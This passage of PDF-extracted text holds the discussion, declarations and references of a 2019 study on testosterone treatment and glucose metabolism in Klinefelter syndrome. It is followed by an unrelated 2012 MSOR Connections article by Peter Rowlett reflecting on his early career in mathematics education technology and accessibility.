indicate placebo-treated KS, black circles indicate testosterone-treated KS and open squares indicate controls. There were no significant difference between groups. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 12588:9 were provided. Thus, it is not clear whether reductions in intra-abdominal adipose tissue, which is normally believed to reflect insulin sensitivity, did in fact occur in that study following treatment. Intermediate metabolism, reflected by free fatty acid and circulating hormones was also unaffected by active treatment. Some studies have indicated that testosterone treatment of hypogonadal patients with type 2 diabetes may primarily help obese patients with improvements in insulin sensitivity (13), while this may not happen in lean patients (14), which could indicate that testosterone therapy works by affecting ‘modifiable fat’, which usually would be visceral fat. However, a meta-analysis including about 2900 men from cross-sectional studies and 850 with type 2 diabetes, showed that testosterone levels were significantly lower in patients with type 2 diabetes even after controlling for age and BMI. Here it was concluded that higher testosterone levels lead to a decreased risk of type 2 diabetes mellitus (33). Testosterone may also have direct effects on insulin sensitivity, because in patients with hypogonadotropic hypogonadism, removal of testosterone replacement therapy leads to reductions in insulin sensitivity within only 14 days (16). We previously showed short-term hypogonadism in healthy males did not affect insulin sensitivity when studied with the gold standard technique, hyperinsulinemic–euglycemic clamp technique (34, 35) and neither during 4 weeks induced hypogonadism (36) or during 20 weeks of treatment with a range of different doses (37), but 1-week treatment of healthy lean men with aromatase inhibitors resulted in slight elevation of testosterone, decreased estradiol levels and decreased insulin sensitivity (38), indicating a role for estradiol in determining insulin sensitivity in males. Previously, we have found normal levels of estradiol in males with KS, with higher levels in testosterone-treated KS (26, 31, 39). Interestingly, we observed only partial suppression of Figure 3 (A) Hemoglobin and IGF-I in males with Klinefelter syndrome during placebo or testosterone treatment and in controls. (B) FFA, insulin and glucagon at baseline and during clamp conditions. Under figure: Open circles indicate placebo- treated KS, closed circles indicate testosterone- treated KS and open squares indicate controls. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 1259 PB–12 8:9 FFAs during the clamp when comparing placebo-treated KS with controls, an indirect sign of insulin resistance. To conclude, there is both epidemiological and clinical evidence that shows a four-fold increased risk of diabetes and metabolic syndrome in KS. Presently, there is no evidence to suggest that testosterone replacement therapy of KS patients improves insulin sensitivity, although it is likely that indirect effects on body composition and physical fitness in the longer term will lead to lowered insulin resistance and thus could protect from development of type 2 diabetes. The dissociation reported here between positive changes in body composition and no changes in glucose homeostasis may indicate that the high prevalence of type 2 diabetes in males with KS is a syndrome-specific trait that perhaps need much longer treatment and more precise normalization of testosterone levels to overcome. Longer term and larger studies will be needed to show this. We saw a significant effect of testosterone treatment on circulating IGF-I, which is otherwise within normal levels in KS, both in childhood and adulthood (29, 40), without any change in IGFBP-3. Testosterone acts both via an effect on GH secretion and action, which subsequently enhances and augments the beneficial effects on fat oxidation and protein synthesis (41). IGFBP-3 was somewhat higher among males with KS, for which we have no ready explanation. We used oral testosterone undecanoate which can show varying bioavailability, but nevertheless has been shown to have effects on body composition before (42), as also shown here. It may have been more efficacious to use either transdermal or injectable testosterone, which might have led to more pronounced effects on different androgen-responsive measures. Although we carefully matched KS and controls, we cannot be sure that the two groups are comparable on socioeconomic factors, habitual physical activity and diet, factors that could for instance affect measures of glucose homeostasis. There were several drop-outs during the study, but there was no common theme in their background for stopping participation in the study. Two males with KS dropped out due to reported side effects of the study medication. These were naïve to the effect of testosterone and thought it unpleasant to feel the normal effects of testosterone treatment. We did not find that there were any consistent differences between drop-outs and those that continued participation. The fact that some patients had never received testosterone, while others had and were using testosterone until inclusion in the study, can thus also be seen as a limitation of the study, and although all males with KS were only examined after 6 months of either active treatment or placebo, we cannot exclude that 6 months is an insufficient washout period for effects of testosterone on for example insulin sensitivity. Thus, we cannot exclude a type II error in the present study and inclusion of a larger study group would have been advantageous. Originally, it was our intent to include more males with KS, but we experienced a great deal of reluctance because of the 6 months of placebo treatment, which especially the males that were treated before entering the trial saw as problematic. We did not experience any serious adverse effects during the study. In conclusion, testosterone for 6 months induces significant and positive effects on body composition in males with KS, including a reduced abdominal fat mass. We observed no changes in measures of glucose homeostasis, but prolonged treatment with testosterone in KS will likely lead to further positive changes also regarding glucose homeostasis. We observed no serious adverse effects of testosterone treatment. Declaration of interest C H is a Senior Editor for Endocrine Connections. C H was not involved in the review or editorial process for this paper, on which he is listed as an author. The other authors have nothing to disclose. Funding All authors have completed the Unified Competing Interest form at www. icmje.org/coi_disclosure.pdf (available on request from the corresponding author) and declare that this study was supported by grants from the Danish Medical Research Council, an unconditional research grant from Ipsen Pharma, grants from the Novo Nordisk Foundation, Aase and Einar Danielsen foundation and the Danish Diabetes Association. None of the study funders had any role in study design, collection, analysis, interpretation, preparation of the manuscript or in the decision to submit the article for publication. Author contribution statement C H, A B, K K, A G J, N H B and C H G contributed substantial to conception and design of the study. C H, K A G, M E and C H G analyzed the data, and C H drafted the manuscript and C H G designed the tables. All authors were involved in the interpretation of the data, critically revised the article and approved the final version for publishing. All authors had full access to the data in the study and take full responsibility for the integrity of the data and the accuracy of the data analysis. CHG is the guarantor of the study and affirms that the manuscript is honest, accurate and transparent and no important aspects of the study have been omitted. Acknowledgements The technical assistance of Lone Svendsen, Lene Christensen, Susanne Sørensen, Hanne Petersen, Hanne Mertz, Joan Hansen (Medical Research This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access www.icmje.org/coi_disclosure.pdf www.icmje.org/coi_disclosure.pdf https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 12608:9 Laboratories) and the staff at the Osteoporosis Clinic, Aarhus University Hospital is highly appreciated. The authors also wish to thank the doctors who referred their KS patients to us. References 1 Bojesen A, Juul S & Gravholt CH. Prenatal and postnatal prevalence of Klinefelter syndrome: a national registry study. Journal of Clinical Endocrinology and Metabolism 2003 88 622–626. (https://doi. org/10.1210/jc.2002-021491) 2 Gravholt CH, Chang S, Wallentin M, Fedder J, Moore P & Skakkebaek A. Klinefelter syndrome – integrating genetics, neuropsychology and endocrinology. Endocrine Reviews 39 389–423. (https://doi.org/10.1210/er.2017-00212) 3 Smyth CM & Bremner WJ. Klinefelter syndrome. Archives of Internal Medicine 1998 158 1309–1314. (https://doi.org/10.1001/ archinte.158.12.1309) 4 Bojesen A, Kristensen K, Birkebaek NH, Fedder J, Mosekilde L, Bennett P, Laurberg P, Frystyk J, Flyvbjerg A, Christiansen JS, et al. The metabolic syndrome is frequent in Klinefelter’s syndrome and is associated with abdominal obesity and hypogonadism. Diabetes Care 2006 29 1591–1598. (https://doi.org/10.2337/dc06-0145) 5 Ishikawa T, Yamaguchi K, Kondo Y, Takenaka A & Fujisawa M. Metabolic syndrome in men with Klinefelter’s syndrome. Urology 2008 71 1109–1113. (https://doi.org/10.1016/j.urology.2008.01.051) 6 Swerdlow AJ, Higgins CD, Schoemaker MJ, Wright AF, Jacobs PA & United Kingdom Clinical Cytogenetics Group. Mortality in patients with Klinefelter syndrome in Britain: a cohort study. Journal of Clinical Endocrinology and Metabolism 2005 90 6516–6522. (https:// doi.org/10.1210/jc.2005-1077) 7 Nielsen J, Johansen K & Yde H. Frequency of diabetes mellitus in patients with Klinefelter’s syndrome of different chromosome constitutions and the XYY syndrome. Plasma insulin and growth hormone level after a glucose load. Journal of Clinical Endocrinology and Metabolism 1969 29 1062–1073. (https://doi.org/10.1210/jcem- 29-8-1062) 8 Pei D, Sheu WH, Jeng CY, Liao WK & Fuh MM. Insulin resistance in patients with Klinefelter’s syndrome and idiopathic gonadotropin deficiency. Journal of the Formosan Medical Association 1998 97 534–540. 9 Grossmann M, Thomas MC, Panagiotopoulos S, Sharpe K, MacIsaac RJ, Clarke S, Zajac JD & Jerums G. Low testosterone levels are common and associated with insulin resistance in men with diabetes. Journal of Clinical Endocrinology and Metabolism 2008 93 1834–1840. (https://doi.org/10.1210/jc.2007-2177) 10 Bojesen A, Juul S, Birkebaek NH & Gravholt CH. Morbidity in Klinefelter syndrome: a Danish register study based on hospital discharge diagnoses. Journal of Clinical Endocrinology and Metabolism 2006 91 1254–1260. (https://doi.org/10.1210/jc.2005-0697) 11 Grossmann M, Gianatti EJ & Zajac JD. Testosterone and type 2 diabetes. Current Opinion in Endocrinology, Diabetes, and Obesity 2010 17 247–256. (https://doi.org/10.1097/MED.0b013e32833919cf) 12 Selvin E, Feinleib M, Zhang L, Rohrmann S, Rifai N, Nelson WG, Dobs A, Basaria S, Golden SH & Platz EA. Androgens and diabetes in men: results from the third National Health and Nutrition Examination Survey (NHANES III). Diabetes Care 2007 30 234–238. (https://doi.org/10.2337/dc06-1579) 13 Heufelder AE, Saad F, Bunck MC & Gooren L. Fifty-two-week treatment with diet and exercise plus transdermal testosterone reverses the metabolic syndrome and improves glycemic control in men with newly diagnosed type 2 diabetes and subnormal plasma testosterone. Journal of Andrology 2009 30 726–733. (https://doi. org/10.2164/jandrol.108.007005) 14 Gopal RA, Bothra N, Acharya SV, Ganesh HK, Bandgar TR, Menon PS & Shah NS. Treatment of hypogonadism with testosterone in patients with type 2 diabetes mellitus. Endocrine Practice 2010 16 570–576. (https://doi.org/10.4158/EP09355.OR) 15 Wang C, Swerdloff RS, Iranmanesh A, Dobs A, Snyder PJ, Cunningham G, Matsumoto AM, Weber T, Berman N & Testosterone Gel Study Group. Transdermal testosterone gel improves sexual function, mood, muscle strength, and body composition parameters in hypogonadal men. Journal of Clinical Endocrinology and Metabolism 2000 85 2839–2853. (https://doi.org/10.1210/jcem.85.8.6747) 16 Yialamas MA, Dwyer AA, Hanley E, Lee H, Pitteloud N & Hayes FJ. Acute sex steroid withdrawal reduces insulin sensitivity in healthy men with idiopathic hypogonadotropic hypogonadism. Journal of Clinical Endocrinology and Metabolism 2007 92 4254–4259. (https:// doi.org/10.1210/jc.2007-0454) 17 Zitzmann M, Bongers R, Werler S, Bogdanova N, Wistuba J, Kliesch S, Gromoll J & Tuttelmann F. Gene expression patterns in relation to the clinical phenotype in Klinefelter syndrome. Journal of Clinical Endocrinology and Metabolism 2015 100 E518–E523. (https://doi. org/10.1210/jc.2014-2780) 18 Ozata M, Ozisik G, Caglayan S, Yesilova Z, Bingol N, Saglam M, Turan M & Beyhan Z. Effects of gonadotropin and testosterone treatments on plasma leptin levels in male patients with idiopathic hypogonadotropic hypogonadism and Klinefelter’s syndrome. Hormone and Metabolic Research 1998 30 266–271. (https://doi. org/10.1055/s-2007-978881) 19 Rotondi M, Coperchini F, Renzullo A, Accardo G, Esposito D, Groppelli G, Magri F, Cittadini A, Isidori AM, Chiovato L, et al. High circulating levels of CCL2 in patients with Klinefelter’s syndrome. Clinical Endocrinology 2014 80 465–467. (https://doi.org/10.1111/ cen.12245) 20 Skakkebaek A, Nielsen MM, Trolle C, Vang S, Hornshoj H, Hedegaard J, Wallentin M, Bojesen A, Hertz JM, Fedder J, et al. DNA hypermethylation and differential gene expression associated with Klinefelter syndrome. Scientific Reports 2018 8 13740. (https://doi. org/10.1038/s41598-018-31780-0) 21 Frayn KN. Calculation of substrate oxidation rates in vivo from gaseous exchange. Journal of Applied Physiology: Respiratory, Environmental and Exercise Physiology 1983 55 628–634. (https://doi. org/10.1152/jappl.1983.55.2.628) 22 Orskov H, Thomsen HG & Yde H. Wick chromatography for rapid and reliable immunoassay of insulin, glucagon and growth hormone. Nature 1968 219 193–195. (https://doi.org/10.1038/219193b0) 23 Abrahamsen B, Gram J, Hansen TB & Beck-Nielsen H. Cross calibration of QDR-2000 and QDR-1000 dual-energy X-ray densitometers for bone mineral and soft-tissue measurements. Bone 1995 16 385–390. (https://doi.org/10.1016/8756-3282(94)00054-9) 24 Astrand I. Aerobic work capacity in men and women with special reference to age. Acta Physiologica Scandinavica: Supplementum 1960 49 1–92. 25 Hagstrom Toft E, Enoksson S, Moberg E, Bolinder J & Arner P. Absolute concentrations of glycerol and lactate in human skeletal muscle, adipose tissue, and blood. American Journal of Physiology 1997 273 E584–E592. (https://doi.org/10.1152/ajpendo.1997.273.3.E584) 26 Chang S, Skakkebaek A, Trolle C, Bojesen A, Hertz JM, Cohen A, Hougaard DM, Wallentin M, Pedersen AD, Ostergaard JR, et al. Anthropometry in Klinefelter syndrome – multifactorial influences due to CAG length, testosterone treatment and possibly intrauterine hypogonadism. Journal of Clinical Endocrinology and Metabolism 2015 100 E508–E517. (https://doi.org/10.1210/jc.2014-2834) 27 Bachman E, Travison TG, Basaria S, Davda MN, Guo W, Li M, Connor Westfall J, Bae H, Gordeuk V & Bhasin S. Testosterone induces erythrocytosis via increased erythropoietin and suppressed hepcidin: evidence for a new erythropoietin/hemoglobin set point. Journals of Gerontology: Series A, Biological Sciences and Medical Sciences 2014 69 725–735. (https://doi.org/10.1093/gerona/glt154) 28 Woodhouse LJ, Gupta N, Bhasin M, Singh AB, Ross R, Phillips J & Bhasin S. Dose-dependent effects of testosterone on regional This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://doi.org/10.1210/jc.2002-021491 https://doi.org/10.1210/jc.2002-021491 https://doi.org/10.1210/er.2017-00212 https://doi.org/10.1001/archinte.158.12.1309 https://doi.org/10.1001/archinte.158.12.1309 https://doi.org/10.2337/dc06-0145 https://doi.org/10.1016/j.urology.2008.01.051 https://doi.org/10.1210/jc.2005-1077 https://doi.org/10.1210/jc.2005-1077 https://doi.org/10.1210/jcem-29-8-1062 https://doi.org/10.1210/jcem-29-8-1062 https://doi.org/10.1210/jc.2007-2177 https://doi.org/10.1210/jc.2005-0697 https://doi.org/10.1097/MED.0b013e32833919cf https://doi.org/10.2337/dc06-1579 https://doi.org/10.2164/jandrol.108.007005 https://doi.org/10.2164/jandrol.108.007005 https://doi.org/10.4158/EP09355.OR https://doi.org/10.1210/jcem.85.8.6747 https://doi.org/10.1210/jc.2007-0454 https://doi.org/10.1210/jc.2007-0454 https://doi.org/10.1210/jc.2014-2780 https://doi.org/10.1210/jc.2014-2780 https://doi.org/10.1055/s-2007-978881 https://doi.org/10.1055/s-2007-978881 https://doi.org/10.1111/cen.12245 https://doi.org/10.1111/cen.12245 https://doi.org/10.1038/s41598-018-31780-0 https://doi.org/10.1038/s41598-018-31780-0 https://doi.org/10.1152/jappl.1983.55.2.628 https://doi.org/10.1152/jappl.1983.55.2.628 https://doi.org/10.1038/219193b0 https://doi.org/10.1016/8756-3282(94)00054-9 https://doi.org/10.1152/ajpendo.1997.273.3.E584 https://doi.org/10.1210/jc.2014-2834 https://doi.org/10.1093/gerona/glt154 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 1261 PB–12 8:9 adipose tissue distribution in healthy young men. Journal of Clinical Endocrinology and Metabolism 2004 89 718–726. (https://doi. org/10.1210/jc.2003-031492) 29 Bojesen A, Birkebaek N, Kristensen K, Heickendorff L, Mosekilde L, Christiansen JS & Gravholt CH. Bone mineral density in Klinefelter syndrome is reduced and primarily determined by muscle strength and resorptive markers, but not directly by testosterone. Osteoporosis International 2011 22 1441–1450. (https://doi.org/10.1007/s00198- 010-1354-7) 30 Davis SM, Cox-Martin MG, Bardsley MZ, Kowal K, Zeitler PS & Ross JL. Effects of oxandrolone on cardiometabolic health in boys with Klinefelter syndrome: a randomized controlled trial. Journal of Clinical Endocrinology and Metabolism 2017 102 176–184. (https://doi. org/10.1210/jc.2016-2904) 31 Host C, Bojesen A, Frystyk J, Flyvbjerg A, Christiansen JS & Gravholt CH. Effect of sex hormone treatment on circulating adiponectin and subforms in Turner and Klinefelter syndrome. European Journal of Clinical Investigation 2010 40 211–219. (https:// doi.org/10.1111/j.1365-2362.2009.02250.x) 32 Selice R, Caretta N, Di Mambro A, Torino M, Palego P, Ferlin A & Foresta C. Prostate volume and growth during testosterone replacement therapy is related to visceral obesity in Klinefelter syndrome. European Journal of Endocrinology 2013 169 743–749. (https://doi.org/10.1530/EJE-13-0488) 33 Corona G, Monami M, Rastrelli G, Aversa A, Sforza A, Lenzi A, Forti G, Mannucci E & Maggi M. Type 2 diabetes mellitus and testosterone: a meta-analysis study. International Journal of Andrology 2011 34 528–540. (https://doi.org/10.1111/j.1365- 2605.2010.01117.x) 34 Host C, Gormsen LC, Christensen B, Jessen N, Hougaard DM, Christiansen JS, Pedersen SB, Jensen MD, Nielsen S & Gravholt CH. Independent effects of testosterone on lipid oxidation and VLDL-TG production: a randomized, double-blind, placebo-controlled, crossover study. Diabetes 2013 62 1409–1416. (https://doi. org/10.2337/db12-0440) 35 Host C, Gormsen LC, Hougaard DM, Christiansen JS, Pedersen SB & Gravholt CH. Acute and short-term chronic testosterone fluctuation effects on glucose homeostasis, insulin sensitivity, and adiponectin: a randomized, double-blind, placebo-controlled, crossover study. Journal of Clinical Endocrinology and Metabolism 2014 99 E1088– E1096. (https://doi.org/10.1210/jc.2013-2807) 36 Rabiee A, Dwyer AA, Caronia LM, Hayes FJ, Yialamas MA, Andersen DK, Thomas B, Torriani M & Elahi D. Impact of acute biochemical castration on insulin sensitivity in healthy adult men. Endocrine Research 2010 35 71–84. (https://doi. org/10.3109/07435801003705601) 37 Singh AB, Hsia S, Alaupovic P, Sinha-Hikim I, Woodhouse L, Buchanan TA, Shen R, Bross R, Berman N & Bhasin S. The effects of varying doses of T on insulin sensitivity, plasma lipids, apolipoproteins, and C-reactive protein in healthy young men. Journal of Clinical Endocrinology and Metabolism 2002 87 136–143. (https://doi.org/10.1210/jcem.87.1.8172) 38 Gibb FW, Homer NZ, Faqehi AM, Upreti R, Livingstone DE, McInnes KJ, Andrew R & Walker BR. Aromatase inhibition reduces insulin sensitivity in healthy men. Journal of Clinical Endocrinology and Metabolism 2016 101 2040–2046. (https://doi.org/10.1210/jc.2015-4146) 39 Shanbhogue VV, Hansen S, Jorgensen NR, Brixen K & Gravholt CH. Bone geometry, volumetric density, microarchitecture and estimated bone strength assessed by HR-pQCT in Klinefelter syndrome. Journal of Bone and Mineral Research 2014 29 2474–2482. (https://doi. org/10.1002/jbmr.2272) 40 Aksglaede L, Skakkebaek NE & Juul A. Abnormal sex chromosome constitution and longitudinal growth: serum levels of insulin-like growth factor (IGF)-I, IGF binding protein-3, luteinizing hormone, and testosterone in 109 males with 47,XXY, 47,XYY, or sex- determining region of the Y chromosome (SRY)-positive 46,XX karyotypes. Journal of Clinical Endocrinology and Metabolism 2008 93 169–176. (https://doi.org/10.1210/jc.2007-1426) 41 Birzniece V & Ho KKY. Sex steroids and the GH axis: implications for the management of hypopituitarism. Best Practice and Research: Clinical Endocrinology and Metabolism 2017 31 59–69. (https://doi. org/10.1016/j.beem.2017.03.003) 42 Emmelot-Vonk MH, Verhaar HJ, Nakhai Pour HR, Aleman A, Lock TM, Bosch JL, Grobbee DE & van der Schouw YT. Effect of testosterone supplementation on functional mobility, cognition, and other parameters in older men: a randomized controlled trial. JAMA 2008 299 39–52. (https://doi.org/10.1001/ jama.2007.51) Received in final form 31 July 2019 Accepted 7 August 2019 Accepted Preprint published online 7 August 2019 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://doi.org/10.1210/jc.2003-031492 https://doi.org/10.1210/jc.2003-031492 https://doi.org/10.1007/s00198-010-1354-7 https://doi.org/10.1007/s00198-010-1354-7 https://doi.org/10.1210/jc.2016-2904 https://doi.org/10.1210/jc.2016-2904 https://doi.org/10.1111/j.1365-2362.2009.02250.x https://doi.org/10.1111/j.1365-2362.2009.02250.x https://doi.org/10.1530/EJE-13-0488 https://doi.org/10.1111/j.1365-2605.2010.01117.x https://doi.org/10.1111/j.1365-2605.2010.01117.x https://doi.org/10.2337/db12-0440 https://doi.org/10.2337/db12-0440 https://doi.org/10.1210/jc.2013-2807 https://doi.org/10.3109/07435801003705601 https://doi.org/10.3109/07435801003705601 https://doi.org/10.1210/jcem.87.1.8172 https://doi.org/10.1210/jc.2015-4146 https://doi.org/10.1002/jbmr.2272 https://doi.org/10.1002/jbmr.2272 https://doi.org/10.1210/jc.2007-1426 https://doi.org/10.1016/j.beem.2017.03.003 https://doi.org/10.1016/j.beem.2017.03.003 https://doi.org/10.1001/jama.2007.51 https://doi.org/10.1001/jama.2007.51 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com Abstract Materials and methods Subjects Study design Hyperinsulinemic euglycemic clamp Analytical techniques Body composition, maximal aerobic capacity and 24-h ambulatory blood pressure measurement Microdialysis Microdialysis Statistics Results Characteristics of study subjects and body composition during treatment Insulin sensitivity and circulating metabolites Sex hormones, gonadotrophins, hemoglobin and hematocrit Resting EE, physical fitness and muscle strength Microdialysis Microdialysis Interstitial concentrations of glucose Interstitial concentrations of glycerol Interstitial concentrations of lactate 24-h ambulatory blood pressure Discussion Declaration of interest Funding Author contribution statement Acknowledgements References work_pluda2lllfaddo2mpqs5n5hkoq ---- MSOR Connections Vol 12 No 2 Summer 2012 1� First steps When the MSOR Network was formed in 2000 I was a first year undergraduate student of mathematics at the University of Nottingham with, typically, no idea what I wanted to do afterwards. After graduating in 2002 I was recruited by Stephen Hibberd and Cliff Litton at Nottingham to develop their Virtual Learning Environment for service mathematics called MELEES. This appointment was for four months before I started a Masters degree in computing and was my first experience of HE mathematics from the point of view of the teacher. The first published article with my name on it anywhere was an account of the implementation of MELEES in MSOR Connections in 2003 [1]. Later that year Pam Bishop published a report I wrote on the state of MathML implementation in current web browsers on the MSOR Network website [2]. Encouraged by this, in 2004 I submitted an account of my MSc dissertation [3], on e-assessment in mathematics, to Cliff Beevers’ Maths-CAA Series which was published online by the MSOR Network from 2001-6. Disability My interest in MathML led me to issues of accessibility. My first solo article in MSOR Connections [4], submitted with confidence gained from my earlier publishing experiences, was a short piece in 2004 about a new version of MathPlayer which could convert MathML to speech. This was an entry in the ‘Have you seen this...?’ series, which offered a quick publishing route for short items that might not warrant an in depth article but were worth bringing to wider attention. It was also listed as ‘DDA Update’, a series which provided disability-related updates in response to new legislation. In 2006 my now-wife Emma and I re-launched the ‘DDA update’ series of articles [5], re-titling this partly to reflect changes to the legislation but mostly to move the focus from the negative – legislative necessity – to focus on ‘supporting disabled students’. In 2008, following an invitation from Michael Grove, I formed a working group ‘Accessing Maths, Stats and OR’ (AccessMSOR) to take an interest in disability matters. We sent a general invitation for interested people to come to Nottingham Trent University for a wide-ranging discussion on disability and MSOR. This initial meeting was reported, of course, in MSOR Connections [6]. Around this time Emma and I, with Michael Whapples, received funding through the MSOR Network mini-projects scheme to investigate visual impairment and particularly the use of Braille to communicate mathematics. We took a paper based on this project to the CETL-MSOR Conference 2008 and this was published in MSOR Connections [7]. Peter Rowlett MSOR Network University of Birmingham p.rowlett@bham.ac.uk Early career Connections with MSOR Peter Rowlett MSOR Connections Vol 12 No 2 Summer 2012 1� My final act as Chair of the working group was to run a one- day workshop giving the findings of our project and others doing similar work. Afterwards, we published contributions from speakers through MSOR Connections [8]. Technology Given my interest in MathML and related technologies, I initiated a new series of articles in MSOR Connections in 2005 on MathML and XML technologies [9]. I wrote other articles about different technologies, graphics [10], blogging [11] and video [12], in 2007 and 2008. These contributions are descriptive, written from the point of view of the uncritical enthusiast. They basically assume that you might want to use these technologies and offer a guide of how to do so. In 2008 I started travelling around the UK for the Institute of Mathematics and its Applications (IMA). This exposed me to different approaches taken at many institutions and led to many tearoom chats with mathematics lecturers about their practice. Some had read an article I had written in Connections and were interested to learn more, others were interested in how departments I had visited approached the issues they were having. In 2009 I started working again for the University of Nottingham, this time in a more general role supporting lecturers in their teaching through technology. Exposure to different approaches and the need to answer questions such as ‘why would I want to introduce this technology into my teaching?’ led me to lose some of my wide-eyed enthusiasm and take an interest in questions of why we might use technology in education. The first evidence of this change in print came with an article in MSOR Connections in 2010 about response system use [13]. This took a sceptical look at the technology and asked when, and indeed if, this technology could be used effectively. Interest in this led to a study at Nottingham of student reaction to response system use, presented at the CETL-MSOR Conference 2010 and published in its proceedings [14]. A later contribution to MSOR Connections took a similar approach to lecture capture technology [15]. Now and next Later in 2010 I started working for the MSOR Network on a project in Mathematical Sciences HE Curriculum Innovation as part of the National HE STEM Programme, reported regularly through MSOR Connections [16]. In 2011, as part of this, I was lucky enough to edit a special issue with contributions from some of the work we are supporting [17]. My interest in higher education mathematics is quite practical – I hope to improve my own practice and help others develop theirs. I think it is extremely valuable for our community to have somewhere to place practitioner articles that might not be suitable for a full research journal. In Connections, people could present the implementation of ideas in development, as we did with MELEES, or provide quick pointers to items of note, as I did with MathPlayer. Articles could be published giving simple examples of use of technologies, such as the ones I wrote on graphics, blogging and video, or attempts to read around a topic, as with the articles on response systems and lecture capture. MSOR Connections also saw interesting opinion pieces by established expert practitioners, grounded in experience rather than research literature but interesting to reflect on and learn from nonetheless. It is interesting, too, to look back and reflect on the wider impact of work that started in MSOR Connections. The gathering of the AccessMSOR community (still going strong under new Chair Emma Cliffe) and the research project into the experiences of students with visual impairments would likely not have occurred, thematically and practically, without us first publishing articles on disability through Connections. Writing those early naive articles on technology implementation led to interesting discussions and drew me to a point in my career where I would begin to question the effectiveness of such technologies in a way I hope is useful. Critically evaluating response systems in Connections led to a research investigation and a CETL- MSOR conference paper. Many times, writing an article for Connections has driven me to think about a topic in depth and genuinely learn and develop myself. (And I haven’t even mentioned reading articles!) While the MSOR Network has existed, I have gone from undergraduate student to be involved with delivering teaching, from uncritical technology enthusiast to take a broader interest in higher education mathematics and how technology and other aspects can work together to improve learning and the student experience. It now seems almost certain I will be with the MSOR Network at the end. The work of the Network will continue through the HEA Discipline Lead and I am delighted to hear that MSOR Connections will continue too. Where I go from here, professionally, is quite uncertain but I feel positive that I go there very much the better for my experience interacting with the MSOR Network and its Connections. References Hibberd, S., Litton, C., Chambers, C. and Rowlett, P., 2003. MELEES – e-support or mayhem? MSOR Connections, 3(3), pp. 29-34. Rowlett, P., 2003. MathML: the current state of play [online]. MSOR Network. Available via: http://mathstore.ac.uk/mathml/rowlett.html [last accessed 13/05/2012]. Rowlett, P.J., 2004. Pseudo-Randomised CAA by “Preprocessing” MathML. Maths-CAA Series [online], September. Available via: http://www.mathstore.ac.uk/ repository/mathscaa_sep2004.pdf [last accessed 13/05/2012]. 1. 2. 3. Early career Connections with MSOR – Peter Rowlett MSOR Connections Vol 12 No 2 Summer 2012 1� Rowlett, P., 2004. MathPlayer and the Design Science Mathematics Accessibility Project. MSOR Connections, 4(2), p. 5. Wright, E.J. and Rowlett, P.J., 2006. Introducing the Supporting Students with Disabilities Series: Disability Legislation Update. MSOR Connections, 6(4), pp. 24-26. Rowlett, E.J., Rowlett, P.J. and Surowiec, R., 2008. AccessMSOR: report on inaugural meeting. MSOR Connections, 8(4), p.42. Rowlett, E.J. and Rowlett, P.J., 2009. Visual impairment in MSOR. MSOR Connections, 9(4), pp. 43-46. Rowlett, P. et al., 2010. Workshop report…Visual impairment in maths, stats and operational research (MSOR). MSOR Connections, 10(2), pp. 45-48. Rowlett, P.J., 2005. MathML/XML Series: An introduction. MSOR Connections, 5(4), pp. 25-26. Rowlett, P.J., 2007. A simple example of dynamic graphics. MSOR Connections, 7(1), pp. 35-37. Rowlett, P.J., 2008. Some approaches to mathematical blogging. MSOR Connections, 8(1), pp. 31-33. Rowlett, P.J., 2008. A quick and easy (rough and ready) method for online video. MSOR Connections, 8(2), pp. 44-45. Rowlett, P., 2010. Ask the audience (yes, all of them). MSOR Connections, 10(1), pp. 3-5. Barton, S. and Rowlett, P., 2011. Using an audience response system – what do the audience DO with the feedback? Proceedings of the CETL-MSOR Conference 2010, University of Birmingham, 6th-7th September 2010, pp. 12-22. Rowlett, P., 2011. Lecture capture technology – technically possible, but can it be used effectively? MSOR Connections, 11(3), pp. 39-42. Rowlett, P., 2010. Introducing the Mathematical Sciences HE Curriculum Innovation Project. MSOR Connections, 10(3), p. 51. Rowlett, P. (ed.), 2011. MSOR Connections, 11(3). 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. Early career Connections with MSOR – Peter Rowlett The HEA is currently inviting subscribing institutions in the UK delivering higher education to participate as 